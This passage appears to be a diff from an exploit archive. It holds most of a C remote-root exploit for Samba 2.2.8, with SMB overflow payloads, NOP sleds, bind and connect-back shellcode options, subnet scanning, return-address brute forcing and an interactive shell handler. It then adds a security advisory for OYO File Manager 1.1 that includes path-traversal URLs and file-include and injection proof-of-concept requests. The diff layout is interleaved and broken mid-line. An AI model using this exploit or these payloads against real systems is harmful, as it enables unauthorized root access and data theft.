shell(int sock)
{ {
fd_set fd_read; fd_set fd_read;
char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE\";uname -a;id;\n";
\";uname -a;id;\n";
int n; int n;
FD_ZERO(&fd_read); FD_ZERO(&fd_read);
@ -567,8 +527,7 @@ shell(int sock)
exit(0); exit(0);
} }
void void handler()
handler()
{ {
int sock = 0; int sock = 0;
int i = 0; int i = 0;
@ -584,8 +543,7 @@ handler()
if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) { if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
fprintf(stdout, "+ Worked!\n" fprintf(stdout, "+ Worked!\n"
"---------------------------------------------- "--------------------------------------------------------------\n");
----------------\n");
shell(sock); shell(sock);
close(sock); close(sock);
} }
@ -593,17 +551,13 @@ handler()
} }
int int start_session(int sock)
start_session(int sock)
{ {
char buffer[1000]; char buffer[1000];
char response[4096]; char response[4096];
char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00 char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
\x00\x00\x00"; char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25 "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";
\x6e\x6f\x62\x6f\x64\x79"
"\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24
";
NETBIOS_HEADER *netbiosheader; NETBIOS_HEADER *netbiosheader;
SMB_HEADER *smbheader; SMB_HEADER *smbheader;
@ -628,8 +582,7 @@ start_session(int sock)
smbheader->uid = 100; smbheader->uid = 100;
smbheader->mid = 0x01; smbheader->mid = 0x01;
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);
ta1, sizeof(session_data1) - 1);
if(write_timer(sock, 3) == 1) if(write_timer(sock, 3) == 1)
if (send(sock, buffer, 50, 0) < 0) return -1; if (send(sock, buffer, 50, 0) < 0) return -1;
@ -642,8 +595,7 @@ ta1, sizeof(session_data1) - 1);
netbiosheader = (NETBIOS_HEADER *)response; netbiosheader = (NETBIOS_HEADER *)response;
smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non sess if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n");
ion message\n");
netbiosheader = (NETBIOS_HEADER *)buffer; netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
@ -663,8 +615,7 @@ ion message\n");
smbheader->tid = 0x00; smbheader->tid = 0x00;
smbheader->uid = 100; smbheader->uid = 100;
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);
ta2, sizeof(session_data2) - 1);
if(write_timer(sock, 3) == 1) if(write_timer(sock, 3) == 1)
if (send(sock, buffer, 64, 0) < 0) return -1; if (send(sock, buffer, 64, 0) < 0) return -1;
@ -682,18 +633,14 @@ ta2, sizeof(session_data2) - 1);
return 0; return 0;
} }
int int exploit_normal(int sock, unsigned long ret, char *shellcode)
exploit_normal(int sock, unsigned long ret, char *shellcode)
{ {
char buffer[4000]; char buffer[4000];
char exploit_data[] = char exploit_data[] =
"\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
00\x00\x00" "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00"
"\x00\x00\x00\x90"; "\x00\x00\x00\x90";
int i = 0; int i = 0;
@ -719,8 +666,7 @@ exploit_normal(int sock, unsigned long ret, char *shellcode)
smbheader->tid = 0x01; smbheader->tid = 0x01;
smbheader->uid = 100; smbheader->uid = 100;
memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);
ploit_data), 0x90, 3000);
buffer[1096] = 0xEB; buffer[1096] = 0xEB;
buffer[1097] = 0x70; buffer[1097] = 0x70;
@ -742,18 +688,14 @@ ploit_data), 0x90, 3000);
return -1; return -1;
} }
int int exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
{ {
char buffer[4000]; char buffer[4000];
char exploit_data[] = char exploit_data[] =
"\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
00\x00\x00" "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00"
"\x00\x00\x00\x90"; "\x00\x00\x00\x90";
int i = 0; int i = 0;
@ -778,8 +720,7 @@ exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
smbheader->tid = 0x01; smbheader->tid = 0x01;
smbheader->uid = 100; smbheader->uid = 100;
memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);
ploit_data), 0x90, 3000);
for (i = 0; i < 4 * 24; i += 4) for (i = 0; i < 4 * 24; i += 4)
memcpy(buffer + 1131 + i, &dummy, 4); memcpy(buffer + 1131 + i, &dummy, 4);
@ -789,8 +730,7 @@ ploit_data), 0x90, 3000);
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
exploit_data, sizeof(exploit_data) - 1); exploit_data, sizeof(exploit_data) - 1);
memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode)) memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));
;
if(write_timer(sock, 3) == 1) { if(write_timer(sock, 3) == 1) {
if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
@ -801,8 +741,7 @@ ploit_data), 0x90, 3000);
} }
int int main (int argc,char *argv[])
main (int argc,char *argv[])
{ {
char *shellcode = NULL; char *shellcode = NULL;
char scan_ip[256]; char scan_ip[256];
@ -832,10 +771,8 @@ main (int argc,char *argv[])
struct hostent *he; struct hostent *he;
fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n"
.org|be)\n" "--------------------------------------------------------------\n");
"------------------------------------------------------
--------\n");
while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) { while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) {
switch(opt) switch(opt)
@ -843,8 +780,7 @@ main (int argc,char *argv[])
case 'b': case 'b':
brute = atoi(optarg); brute = atoi(optarg);
if ((brute < 0) || (brute > 3)) { if ((brute < 0) || (brute > 3)) {
fprintf(stderr, "Invalid platform.\n\n" fprintf(stderr, "Invalid platform.\n\n");
);
return -1; return -1;
} }
break; break;
@ -853,38 +789,29 @@ main (int argc,char *argv[])
if (STEPS == 0) STEPS++; if (STEPS == 0) STEPS++;
break; break;
case 'c': case 'c':
sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
&ip4);
connectback = 1; connectback = 1;
if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) {
0) { fprintf(stderr, "Invalid IP address.\n\n");
fprintf(stderr, "Invalid IP address.\n\
n");
return -1; return -1;
} }
linux_connect_back[33] = ip1; bsd_connect_back[ linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1;
24] = ip1; linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2;
linux_connect_back[34] = ip2; bsd_connect_back[ linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3;
25] = ip2; linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4;
linux_connect_back[35] = ip3; bsd_connect_back[
26] = ip3;
linux_connect_back[36] = ip4; bsd_connect_back[
27] = ip4;
break; break;
case 'C': case 'C':
MAX_CHILDS = atoi(optarg); MAX_CHILDS = atoi(optarg);
if (MAX_CHILDS == 0) { if (MAX_CHILDS == 0) {
fprintf(stderr, "Invalid number of chil fprintf(stderr, "Invalid number of childs.\n");
ds.\n");
return -1; return -1;
} }
if (MAX_CHILDS > 99) { if (MAX_CHILDS > 99) {
fprintf(stderr, "Too many childs, using fprintf(stderr, "Too many childs, using 99. \n");
99. \n");
MAX_CHILDS = 99; MAX_CHILDS = 99;
} }
@ -918,13 +845,8 @@ ds.\n");
case 't': case 't':
type = atoi(optarg); type = atoi(optarg);
if (type == 0 || type > sizeof(targets) / 16) { if (type == 0 || type > sizeof(targets) / 16) {
for(i = 0; i < sizeof(targets) / 16; i+ for(i = 0; i < sizeof(targets) / 16; i++)
+) fprintf(stdout, "%02d. %s [0x%08x]\n", i + 1, targets[i].type, (unsigned int) targets[i].ret);
fprintf(stdout, "%02d. %s
[0x%08x]\n", i + 1,
targets[i].type
, (unsigned int) targets[i].ret);
fprintf(stderr, "\n"); fprintf(stderr, "\n");
return -1; return -1;
} }
@ -939,8 +861,7 @@ ds.\n");
} }
if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0))
scan == 0))
usage(argv[0] == NULL ? "sambal" : argv[0]); usage(argv[0] == NULL ? "sambal" : argv[0]);
if (scan == 1) if (scan == 1)
@ -967,20 +888,17 @@ ds.\n");
for (ip4 = 0; ip4 < 255; ip4++) { for (ip4 = 0; ip4 < 255; ip4++) {
i++; i++;
snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.% snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4);
u.%u", ip1, ip2, ip3, ip4);
usleep(BRUTE_DELAY); usleep(BRUTE_DELAY);
switch (fork()) { switch (fork()) {
case 0: case 0:
switch(is_samba(scan_ip, 2)) { switch(is_samba(scan_ip, 2)) {
case 0: case 0:
fprintf(stdout, fprintf(stdout, "+ [%s] Samba\n", scan_ip);
"+ [%s] Samba\n", scan_ip);
break; break;
case 1: case 1:
fprintf(stdout, fprintf(stdout, "+ [%s] Windows\n", scan_ip);
"+ [%s] Windows\n", scan_ip);
break; break;
default: default:
break; break;
@ -989,8 +907,7 @@ u.%u", ip1, ip2, ip3, ip4);
exit(0); exit(0);
break; break;
case -1: case -1:
fprintf(stderr, "+ fork() error fprintf(stderr, "+ fork() error\n");
\n");
exit(-1); exit(-1);
break; break;
default: default:
@ -1022,8 +939,7 @@ u.%u", ip1, ip2, ip3, ip4);
shellcode = targets[type - 1].shellcode; shellcode = targets[type - 1].shellcode;
if (connectback == 1) { if (connectback == 1) {
fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:452 fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:45295]\n",
95]\n",
ip1, ip2, ip3, ip4); ip1, ip2, ip3, ip4);
switch(targets[type - 1].os_type) { switch(targets[type - 1].os_type) {
@ -1061,31 +977,26 @@ u.%u", ip1, ip2, ip3, ip4);
addr2.sin_family = AF_INET; addr2.sin_family = AF_INET;
addr2.sin_port = htons(45295); addr2.sin_port = htons(45295);
if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) {
-1) {
fprintf(stderr, "+ connect() error.\n"); fprintf(stderr, "+ connect() error.\n");
return -1; return -1;
} }
if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].t if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].type);
ype);
if (force == 0) { if (force == 0) {
if (is_samba(argv[optind], 2) != 0) { if (is_samba(argv[optind], 2) != 0) {
fprintf(stderr, "+ Host is not running samba!\n fprintf(stderr, "+ Host is not running samba!\n\n");
\n");
return -1; return -1;
} }
fprintf(stderr, "+ Host is running samba.\n"); fprintf(stderr, "+ Host is running samba.\n");
} }
if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", ( if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port);
char *)inet_ntoa(addr1.sin_addr), port);
if (start_session(sock) < 0) fprintf(stderr, "+ Session failed. if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.\n");
\n");
if (verbose == 1) fprintf(stdout, "+ Session enstablished\n"); if (verbose == 1) fprintf(stdout, "+ Session enstablished\n");
sleep(5); sleep(5);
@ -1104,16 +1015,13 @@ char *)inet_ntoa(addr1.sin_addr), port);
sleep(2); sleep(2);
if (connectback == 0) { if (connectback == 0) {
if(connect(sock2, (struct sockaddr *)&addr2, sizeof(add if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) {
r2)) == -1) { fprintf(stderr, "+ Exploit failed, try -b to bruteforce.\n");
fprintf(stderr, "+ Exploit failed, try -b to br
uteforce.\n");
return -1; return -1;
} }
fprintf(stdout, "-------------------------------------- fprintf(stdout, "--------------------------------------------------------------\n");
------------------------\n");
shell(sock2); shell(sock2);
close(sock); close(sock);
@ -1138,20 +1046,17 @@ uteforce.\n");
case 1: case 1:
if (ret == 0) ret = 0xbfc00000; if (ret == 0) ret = 0xbfc00000;
shellcode = bsd_bindcode; shellcode = bsd_bindcode;
fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\ fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\n");
n");
break; break;
case 2: case 2:
if (ret == 0) ret = 0xdfc00000; if (ret == 0) ret = 0xdfc00000;
shellcode = bsd_bindcode; shellcode = bsd_bindcode;
fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and pr fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and prior)\n");
ior)\n");
break; break;
case 3: case 3:
if (ret == 0) ret = 0x00170000; if (ret == 0) ret = 0x00170000;
shellcode = bsd_bindcode; shellcode = bsd_bindcode;
fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non- fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\n");
exec stack)\n");
break; break;
} }
@ -1182,8 +1087,7 @@ exec stack)\n");
if (sock2 > 2) close(sock2); if (sock2 > 2) close(sock2);
if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
if (verbose == 1) fprintf(stderr, "+ socket() error.\n" if (verbose == 1) fprintf(stderr, "+ socket() error.\n");
);
} }
else { else {
ret -= STEPS; ret -= STEPS;
@ -1191,21 +1095,18 @@ exec stack)\n");
} }
if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)
if (verbose == 1) fprintf(stderr, "+ socket() error.\n" if (verbose == 1) fprintf(stderr, "+ socket() error.\n");
);
if ((ret & 0xff) == 0x00 && brute != 3) ret++; if ((ret & 0xff) == 0x00 && brute != 3) ret++;
if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (u if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (unsigned int)ret);
nsigned int)ret);
usleep(BRUTE_DELAY); usleep(BRUTE_DELAY);
switch (childs[i] = fork()) { switch (childs[i] = fork()) {
case 0: case 0:
if(Connect(sock, (char *)inet_ntoa(addr1.sin_ad if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) {
dr), port, 2) == -1) {
if (sock > 2) close(sock); if (sock > 2) close(sock);
if (sock2 > 2) close(sock2); if (sock2 > 2) close(sock2);
exit(-1); exit(-1);
@ -1213,30 +1114,23 @@ dr), port, 2) == -1) {
if(write_timer(sock, 3) == 1) { if(write_timer(sock, 3) == 1) {
if (start_session(sock) < 0) { if (start_session(sock) < 0) {
if (verbose == 1) fprintf(stder if (verbose == 1) fprintf(stderr, "+ Session failed.\n");
r, "+ Session failed.\n");
if (sock > 2)close(sock); if (sock > 2)close(sock);
if (sock2 > 2) close(sock2); if (sock2 > 2) close(sock2);
exit(-1); exit(-1);
} }
if (brute == 3) { if (brute == 3) {
if (exploit_openbsd32(sock, ret if (exploit_openbsd32(sock, ret, shellcode) < 0) {
, shellcode) < 0) { if (verbose == 1) fprintf(stderr, "+ Failed.\n");
if (verbose == 1) fprin if (sock > 2) close(sock);
tf(stderr, "+ Failed.\n"); if (sock2 > 2) close(sock2);
if (sock > 2) close(so
ck);
if (sock2 > 2) close(so
ck2);
exit(-1); exit(-1);
} }
} }
else { else {
if (exploit_normal(sock, ret, shellcode if (exploit_normal(sock, ret, shellcode) < 0) {
) < 0) { if (verbose == 1) fprintf(stderr, "+ Failed.\n");
if (verbose == 1) fprintf(stder
r, "+ Failed.\n");
if (sock > 2) close(sock); if (sock > 2) close(sock);
if (sock2 > 2) close(sock2); if (sock2 > 2) close(sock2);
exit(-1); exit(-1);
@ -1244,14 +1138,12 @@ r, "+ Failed.\n");
if (sock > 2) close(sock); if (sock > 2) close(sock);
if ((sock2 = socket(AF_INET, SOCK_STREA if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
M, 6)) < 0) {
if (sock2 > 2) close(sock2); if (sock2 > 2) close(sock2);
exit(-1); exit(-1);
} }
if(Connect(sock2, (char *)inet_ntoa(add if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
r1.sin_addr), 45295, 2) != -1) {
if (sock2 > 2) close(sock2); if (sock2 > 2) close(sock2);
kill(getppid(), SIGUSR1); kill(getppid(), SIGUSR1);
} }

355
platforms/multiple/webapps/37058.txt Executable file
View file

@ -0,0 +1,355 @@
Document Title:
===============
OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1494
Release Date:
=============
2015-05-18
Vulnerability Laboratory ID (VL-ID):
====================================
1493
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
OYO File Manager, helps you to manage files in your mobile from your computer over wifi, without USB cable. Also, view your photo albums, play songs and videos.
Store files in drive page and do all the file operations, such as Create, Move, Delete, Edit, Copy, Rename, Zip, unzip, and get information about file.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/oyo-file-manager/id981145759 & https://play.google.com/store/apps/details?id=com.whatbig.filemanager )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research team discovered multiple Vulnerabilities in the official OYO File Manager v1.1 iOS & Android mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-05-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Balaji Rajan
Product: OYO File Manager - iOS & Android 1.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1 Local File Include Vulnerability
A local file include web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application.
The file include vulnerability allows remote attackers to unauthorized include local file/path requests to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload(GCDWebUploader)` module. Attackers are able to inject own files with malicious
`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in
the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the local file include request by usage of the
`wifi interface` in connection with the vulnerable file upload POST method request. Injects are also possible via local file sync function.
Local attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
attack requests.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] upload (GCDWebUploader)
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
1.2 Local Command Injection Vulnerability
A local command inject web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application.
The issue allows remote attackers to inject own commands by usage of stable device values to compromise the ios or android mobile web-application.
The command inject vulnerability is located in the vulnerable `devicename` value of the `index` module. Local attackers are able to inject own
own malicious system specific commands to requests the vulnerable `devicename` value. The devicename value is displayed in the header location
of the file dir index module. The execution point is in the main index context and the injection point is the local device to app sync.
The attack vector is located on the application-side and the injection requires physical device access or a local low privileged device user account.
Local attackers are also able to exploit the devicename validation issue in combination with persistent injected script codes.
The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6.
Exploitation of the command/path inject vulnerability requires a low privileged ios/android device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands to compromise the mobile Android/iOS application
or the connected device components.
Request Method(s):
[+] [SYNC]
Vulnerable Module(s):
[+] Path Listing
Vulnerable Parameter(s):
[+] devicename
1.3 Remote Path Traversal Vulnerability
A Path Traveral web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application.
The security vulnerability allows remote attackers to unauthorized request system path variables to compromise the mobile application or device.
The vulnerability is located in the `path` value of the `open and list` interface module. Remote attackers are able to change the path variable
to unauthorized request device files or directories. The vulnerability can be exploited by local or remote attackers without user interaction.
The attack vector is located on the application-side of the service and the request method to execute is GET (client-side).
The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9.
Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction.
Successful exploitation of the vulnerability results in mobile application compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] open
[+] list
Vulnerable Parameter(s):
[+] path
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the interface
2. Start a session tamper
3. Upload a reandom file
4. Change in the upload POST method request the vulnerable filename to a local file variable
Note: The website reloads
5. The execution occurs in the main file dir index were the upload has been replaced
6. Successful reproduce of the mobile web vulnerability!
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/upload
Load Flags[LOAD_BYPASS_CACHE ] Größe des Inhalts[2] Mime Type[application/json]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Content-Length[831]
Content-Type[multipart/form-data; boundary=---------------------------33361466725643]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
POST_DATA[-----------------------------33361466725643
Content-Disposition: form-data; name="path"/test23/
-----------------------------33361466725643
Content-Disposition: form-data; name="files[]"; filename="../[LOCAL FILE INCLUDE VULNERABILITY!]testfile.png"
Content-Type: image/png
- Response
Status=OK - 200
Server=GCDWebUploader
Cache-Control=no-cache
Content-Length=2
Content-Type=application/json
Connection=Close
Date=Tue, 12 May 2015 12:24:23 GMT
Reference(s):
http://localhost/upload
1.2
The local command inject web vulnerability can be exploited by local attackers with low privilege application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Install the android or ios application to your device
2. Start the application
3. Change the local devicename value in the ios settings to a own payload string (local command inject)
4. Save the settings
5. Open the wifi interface and watch the index webserver site
6. The execution occurs in the header location of the webpage were the devicename value is visible
6. Successful reproduce of the mobile web vulnerability!
PoC:
<spna><img src="img/OYO.png" alt="OYO" style="margin-left:-30px;" height="87" width="87"><span> </span>
<span style="font-size:20px;">[LOCAL COMMAND INJECT VULNERABILITY!]23</span> <span style="font-size: 15px;color: #CCCCCC;">IOS Version 8.3</span>
<span style="float:right;font-size:18px;width:400px;">
<div class="progress">
<div class="progress-bar progress-bar-success" role="progressbar" aria-valuenow="1394098176.00" aria-valuemin="0" aria-valuemax="12.74" style="width:95.22%">
25.89 GB used</div>
<!-- <span style="font-size:10px;padding-left:20px;padding-bottom:5px;"> 1.30 GB Free Space</span>-->
<!-- Drag & drop files OR Just upload your Files-->
<div class="progress-bar progress-bar-warning" role="progressbar" aria-valuenow="25.89 GB" aria-valuemin="0" aria-valuemax="12.74" style="width:4.78%">
1.30 GB free space
</div></div></span></spna>
1.3
the path traversal web vulnerability can be exploited by remote attackers without user interaction or privilege web application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload(s)
http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/
http://localhost/open?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/
http://localhost/download?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[59] Mime Type[application/json]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Server[GCDWebUploader]
Cache-Control[no-cache]
Content-Length[59]
Content-Type[application/json]
Connection[Close]
Date[Tue, 12 May 2015 12:24:25 GMT]
14:21:43.214[9ms][total 9ms] Status: 200[OK]
GET http://localhost/open?path=/%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png Load Flags[LOAD_NORMAL] Größe des Inhalts[538] Mime Type[image/png]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Etag[8831597/1431433463/0]
Last-Modified[Tue, 12 May 2015 12:24:23 GMT]
Server[GCDWebUploader]
Content-Type[image/png]
Content-Length[538]
Connection[Close]
Date[Tue, 12 May 2015 12:24:25 GMT]
Cache-Control[no-cache]
Reference(s):
http://localhost/list?path=
http://localhost/open?path=
http://localhost/download?path=
Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload POST method request.
Restrict the input and disallow special chars. Parse the output in the file dir index list to prevent local file include attacks via upload.
1.2
Restrict the devicename value and disallow special chars. Encode the devicename value to prevent local command injection attacks.
1.3
The directory traversal web vulnerability can be patched by a secure restriction and parse of the path name value in the open and list module context.
Encode the input of files to folders and disallow special chars. Implement a whitelist or a exception to prevent unauthorized path value requests via GET method.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the filename value of the manager is estimated as high. (CVSS 6.5)
1.2
The security risk of the local command inject web vulnerability in the devicename value of the manager is estimated as high. (CVSS 5.6)
1.3
The security risk of the path traversal web vulnerability in the path value of the manager is estimated as high. (CVSS 6.9)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
